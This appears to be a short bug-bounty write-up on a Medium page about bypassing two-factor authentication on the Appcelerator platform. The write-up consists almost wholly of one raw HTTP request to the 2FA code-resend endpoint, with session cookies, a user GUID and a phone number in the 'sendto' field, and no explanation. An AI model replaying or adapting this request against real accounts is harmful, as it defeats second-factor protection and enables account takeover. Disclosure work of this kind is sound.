2 Factor Authentication Bypass on Appcelerator

POST /api/v1/auth/deviceauth/resend?_=1468379493167 HTTP/1.1  Host:platform.appcelerator.com 
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0 Accept: application/json; charset=utf- 8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With:XMLHttpRequest
Referer: https://platform.appcelerator.com/ Content-Length: 89 Cookie:connect.sid=s%3AuaT30j6RosUYLUwCMIFsW10jzxIDLRN8.mVIeYgdbfu8PhbkILdy07yWEAiZZ4GUv4%2B5qpo%2BpaRQ;aid=653cf33a8dbd00dbc2c431935fc281a8c80b3baa3642dcca;aidsid=76c8766c427b466a7bd110a391e64a684ce74192; _ga=GA1.2.1540821944.1468379453; _gat=1; dvid=5e5bafae-b83e-41c1-9c2f-d154b24d8e69
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
user_guid=0f402223-54a8-4b66-91b4- 300af56d9c46&from=web&sendby=sms&sendto=%2B919061100000




Self-learner |Bug Hunter|

Love podcasts or audiobooks? Learn on the go with our new app.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Akash c

Akash c

Self-learner |Bug Hunter|

More from Medium

PicoCTF 2022 — Binary Exploitation: ropfu

Invoca Capture the Flag (CTF) 2022

Invoca CTF Logo

Security Guidance for the Apache Log4j vulnerability (CVE-2021–44228)

Putting an Active Directory Domain Controller Out to Pasture